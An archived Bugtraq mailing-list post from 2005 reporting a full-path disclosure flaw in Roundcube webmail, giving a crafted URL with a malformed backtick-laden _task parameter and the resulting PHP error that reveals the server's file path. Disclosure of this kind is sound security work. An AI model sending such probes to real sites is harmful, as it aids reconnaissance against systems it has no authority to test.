[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Fullpath disclosure in roundcube webmail

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Fullpath disclosure in roundcube webmail
From: king_purba@xxxxxxxxxxx
Date: 17 Dec 2005 19:43:19 -0000

I try this request in my mailbox
http://xxxx.com/roundcube/?_auth=3Dcf559dcf52d8801ccd51cd1f3ba3eca08d1b0bce=
&_task=3Dma%60il
then roundcube shows this warning

**PHP Error in /usr/local/apache2/htdocs/roundcube/index.php (301)*:* Invalid
request failed/file not found

The requested page was not found!
Please contact your server-administrator.

*Failed request:*
http://xxxx.com/roundcube/?_auth=3Dcf559dcf52d8801ccd51cd1f3ba3eca08d1b0bce=
&_task=3Dma%60il

Prev by Date: Microsoft IIS Remote Denial of Service (DoS) .DLL Url exploit
Next by Date: Re: Bypass XSS filter in PHPNUKE 7.9=>x
Previous by thread: Microsoft IIS Remote Denial of Service (DoS) .DLL Url exploit
Next by thread: Re: Fullpath disclosure in roundcube webmail
Index(es):
- Date
- Thread